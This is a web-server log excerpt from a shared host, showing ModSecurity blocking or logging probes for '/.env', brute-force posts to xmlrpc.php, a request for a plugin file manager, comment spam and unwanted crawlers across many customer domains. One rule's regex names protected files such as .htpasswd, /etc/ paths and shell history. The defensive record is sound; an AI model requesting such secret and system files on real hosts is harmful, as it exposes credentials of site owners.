[Tue May 26 15:42:07.713898 2026] [security2:error] [pid 733610:tid 733773] [client 176.65.139.235:20580] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "krishnawoodworks.com"] [uri "/.env"] [unique_id "ahVx98LL_4PasUNKBsfcjAAAACE"]
[Tue May 26 15:42:07.722506 2026] [security2:error] [pid 733610:tid 733787] [client 223.123.35.44:35751] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVx98LL_4PasUNKBsfcjQAAAC8"]
[Tue May 26 15:42:07.722601 2026] [security2:error] [pid 733610:tid 733787] [client 223.123.35.44:35751] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVx98LL_4PasUNKBsfcjQAAAC8"]
[Tue May 26 15:42:09.663195 2026] [security2:error] [pid 733610:tid 733799] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx-cLL_4PasUNKBsfctwAAADs"]
[Tue May 26 15:42:11.664814 2026] [security2:error] [pid 733610:tid 733822] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx-8LL_4PasUNKBsfc_gAAAFI"]
[Tue May 26 15:42:12.947329 2026] [security2:error] [pid 733610:tid 733852] [client 103.153.130.62:59993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx_MLL_4PasUNKBsfdNgAAAHA"]
[Tue May 26 15:42:12.947538 2026] [security2:error] [pid 733610:tid 733852] [client 103.153.130.62:59993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVx_MLL_4PasUNKBsfdNgAAAHA"]
[Tue May 26 15:42:13.913795 2026] [security2:error] [pid 733610:tid 733785] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx_cLL_4PasUNKBsfdSgAAAC0"]
[Tue May 26 15:42:13.970985 2026] [security2:error] [pid 733610:tid 733661] [remote 74.7.241.58:39594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVx_cLL_4PasUNKBsfdewAAOTI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Emails
[Tue May 26 15:42:15.272269 2026] [security2:error] [pid 733610:tid 733818] [client 62.244.225.226:14234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVx_sLL_4PasUNKBsfdlQAAAE4"]
[Tue May 26 15:42:15.967455 2026] [security2:error] [pid 733610:tid 733855] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVx_8LL_4PasUNKBsfdqgAAAHM"]
[Tue May 26 15:42:18.097293 2026] [security2:error] [pid 733610:tid 733814] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyAcLL_4PasUNKBsfd8AAAAEo"]
[Tue May 26 15:42:19.628491 2026] [security2:error] [pid 733610:tid 733841] [client 123.30.202.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyA8LL_4PasUNKBsfeHwAAAGU"]
[Tue May 26 15:42:20.096616 2026] [security2:error] [pid 733610:tid 733796] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyA8LL_4PasUNKBsfeLQAAADg"]
[Tue May 26 15:42:22.387015 2026] [security2:error] [pid 733610:tid 733850] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyBcLL_4PasUNKBsfeawAAAG4"]
[Tue May 26 15:42:23.314479 2026] [security2:error] [pid 733610:tid 733849] [client 103.153.130.62:60357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyB8LL_4PasUNKBsfelAAAAG0"]
[Tue May 26 15:42:23.314590 2026] [security2:error] [pid 733610:tid 733849] [client 103.153.130.62:60357] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyB8LL_4PasUNKBsfelAAAAG0"]
[Tue May 26 15:42:24.497144 2026] [security2:error] [pid 733610:tid 733815] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyCMLL_4PasUNKBsfergAAAEs"]
[Tue May 26 15:42:26.581277 2026] [security2:error] [pid 733610:tid 733838] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyCsLL_4PasUNKBsfe7gAAAGI"]
[Tue May 26 15:42:28.458375 2026] [security2:error] [pid 733610:tid 733837] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyDMLL_4PasUNKBsffJwAAAGE"]
[Tue May 26 15:42:28.590432 2026] [security2:error] [pid 733610:tid 733753] [client 47.128.22.17:17506] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "poonawallatennisacademy.com"] [uri "/robots.txt"] [unique_id "ahVyDMLL_4PasUNKBsffNgAAAA0"]
[Tue May 26 15:42:30.869639 2026] [security2:error] [pid 733610:tid 733743] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyDsLL_4PasUNKBsffXwAAAAM"]
[Tue May 26 15:42:32.278231 2026] [security2:error] [pid 733610:tid 733756] [client 114.119.155.83:28669] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVyEMLL_4PasUNKBsffngAAABA"], referer: http://glorodavionics.com/beta/index.php?route=product/product&path=72_79_130&product_id=176
[Tue May 26 15:42:32.760679 2026] [security2:error] [pid 733610:tid 733767] [client 103.133.24.243:43414] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyEMLL_4PasUNKBsffpAAAABs"]
[Tue May 26 15:42:32.909029 2026] [security2:error] [pid 733610:tid 733767] [client 103.133.24.243:43414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyEMLL_4PasUNKBsffpAAAABs"]
[Tue May 26 15:42:32.909098 2026] [security2:error] [pid 733610:tid 733767] [client 103.133.24.243:43414] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyEMLL_4PasUNKBsffpAAAABs"]
[Tue May 26 15:42:32.994635 2026] [security2:error] [pid 733610:tid 733851] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyEMLL_4PasUNKBsffpwAAAG8"]
[Tue May 26 15:42:33.787209 2026] [security2:error] [pid 733610:tid 733865] [client 103.153.130.62:60626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyEcLL_4PasUNKBsffzgAAAH0"]
[Tue May 26 15:42:33.787394 2026] [security2:error] [pid 733610:tid 733865] [client 103.153.130.62:60626] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyEcLL_4PasUNKBsffzgAAAH0"]
[Tue May 26 15:42:34.882752 2026] [security2:error] [pid 733610:tid 733764] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyEsLL_4PasUNKBsff5QAAABg"]
[Tue May 26 15:42:36.527530 2026] [security2:error] [pid 733610:tid 733827] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyFMLL_4PasUNKBsfgEAAAAFc"]
[Tue May 26 15:42:37.172891 2026] [security2:error] [pid 733610:tid 733753] [client 103.133.24.243:43522] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyFMLL_4PasUNKBsfgLAAAAA0"]
[Tue May 26 15:42:37.212260 2026] [security2:error] [pid 733610:tid 733753] [client 103.133.24.243:43522] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyFMLL_4PasUNKBsfgLAAAAA0"]
[Tue May 26 15:42:38.115965 2026] [autoindex:error] [pid 733610:tid 733795] [client 44.214.182.67:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:42:38.626419 2026] [security2:error] [pid 733610:tid 733826] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyFsLL_4PasUNKBsfgTQAAAFY"]
[Tue May 26 15:42:39.796532 2026] [security2:error] [pid 733610:tid 733810] [client 34.56.168.230:5632] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVyFsLL_4PasUNKBsfgRgAARmQ"]
[Tue May 26 15:42:39.998568 2026] [security2:error] [pid 733610:tid 733828] [client 34.56.168.230:5632] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.wrapmachines.com"] [uri "/index.php"] [unique_id "ahVyF8LL_4PasUNKBsfgfgAAWGo"]
[Tue May 26 15:42:41.819852 2026] [security2:error] [pid 733610:tid 733815] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyGcLL_4PasUNKBsfgtAAAAEs"]
[Tue May 26 15:42:41.947687 2026] [security2:error] [pid 733610:tid 733790] [client 103.133.24.243:43624] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyGcLL_4PasUNKBsfguwAAADI"]
[Tue May 26 15:42:41.982475 2026] [security2:error] [pid 733610:tid 733790] [client 103.133.24.243:43624] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyGcLL_4PasUNKBsfguwAAADI"]
[Tue May 26 15:42:43.000656 2026] [security2:error] [pid 733610:tid 733778] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyGsLL_4PasUNKBsfg5gAAACY"]
[Tue May 26 15:42:44.154761 2026] [security2:error] [pid 733610:tid 733800] [client 103.153.130.62:60891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyHMLL_4PasUNKBsfhIQAAADw"]
[Tue May 26 15:42:44.154878 2026] [security2:error] [pid 733610:tid 733800] [client 103.153.130.62:60891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyHMLL_4PasUNKBsfhIQAAADw"]
[Tue May 26 15:42:44.938076 2026] [security2:error] [pid 733610:tid 733813] [client 14.161.156.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyHMLL_4PasUNKBsfhMwAAAEk"]
[Tue May 26 15:42:45.417546 2026] [security2:error] [pid 733610:tid 733771] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyHMLL_4PasUNKBsfhRgAAAB8"]
[Tue May 26 15:42:47.243321 2026] [security2:error] [pid 733610:tid 733809] [client 43.172.195.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVyHsLL_4PasUNKBsfhewAAAEU"]
[Tue May 26 15:42:47.511931 2026] [security2:error] [pid 733610:tid 733768] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyH8LL_4PasUNKBsfhigAAABw"]
[Tue May 26 15:42:47.621019 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:43710] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyH8LL_4PasUNKBsfhkQAAAHQ"]
[Tue May 26 15:42:47.699502 2026] [security2:error] [pid 733610:tid 733839] [client 74.7.241.180:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVyH8LL_4PasUNKBsfhhwAAAGM"]
[Tue May 26 15:42:47.700263 2026] [security2:error] [pid 733610:tid 733801] [client 74.7.241.180:57078] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.leakyleaks.moes-art.com"] [uri "/robots.txt"] [unique_id "ahVyH8LL_4PasUNKBsfhhQAAPXU"]
[Tue May 26 15:42:47.711466 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:43710] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyH8LL_4PasUNKBsfhkQAAAHQ"]
[Tue May 26 15:42:47.711512 2026] [security2:error] [pid 733610:tid 733856] [client 103.133.24.243:43710] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyH8LL_4PasUNKBsfhkQAAAHQ"]
[Tue May 26 15:42:48.537402 2026] [security2:error] [pid 733610:tid 733761] [client 4.228.83.111:3578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVyIMLL_4PasUNKBsfhtgAAABU"]
[Tue May 26 15:42:48.537545 2026] [security2:error] [pid 733610:tid 733761] [client 4.228.83.111:3578] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVyIMLL_4PasUNKBsfhtgAAABU"]
[Tue May 26 15:42:48.968098 2026] [security2:error] [pid 733610:tid 733754] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyIMLL_4PasUNKBsfhvwAAAA4"]
[Tue May 26 15:42:49.377867 2026] [security2:error] [pid 733610:tid 733816] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVyIcLL_4PasUNKBsfh0wAAAEw"]
[Tue May 26 15:42:49.506723 2026] [security2:error] [pid 733610:tid 733769] [client 23.19.248.135:49088] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyIMLL_4PasUNKBsfhyQAAAB0"], referer: https://www.cagmedya.com/kucuk-isletmeler-icin-web-tasarim-rehberi/
[Tue May 26 15:42:49.923099 2026] [security2:error] [pid 733610:tid 733847] [client 4.228.83.111:40523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/admin.php"] [unique_id "ahVyIcLL_4PasUNKBsfiGwAAAGs"]
[Tue May 26 15:42:49.923254 2026] [security2:error] [pid 733610:tid 733847] [client 4.228.83.111:40523] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/admin.php"] [unique_id "ahVyIcLL_4PasUNKBsfiGwAAAGs"]
[Tue May 26 15:42:50.122710 2026] [security2:error] [pid 733610:tid 733801] [client 202.14.4.153:46669] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVyIcLL_4PasUNKBsfh2gAAAD0"], referer: https://www.cagmedya.com/kayseri-web-tasarim/
[Tue May 26 15:42:51.822603 2026] [security2:error] [pid 733610:tid 733749] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyI8LL_4PasUNKBsfiQwAAAAk"]
[Tue May 26 15:42:52.797155 2026] [security2:error] [pid 733610:tid 733800] [client 4.228.83.111:35258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/goods.php"] [unique_id "ahVyJMLL_4PasUNKBsfiaQAAADw"]
[Tue May 26 15:42:52.797280 2026] [security2:error] [pid 733610:tid 733800] [client 4.228.83.111:35258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.rabbanitradingcompany.com"] [uri "/goods.php"] [unique_id "ahVyJMLL_4PasUNKBsfiaQAAADw"]
[Tue May 26 15:42:52.909791 2026] [security2:error] [pid 733610:tid 733793] [client 103.133.24.243:43796] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "poonawallatennisacademy.com"] [uri "/wp-comments-post.php"] [unique_id "ahVyJMLL_4PasUNKBsfiYQAAADU"]
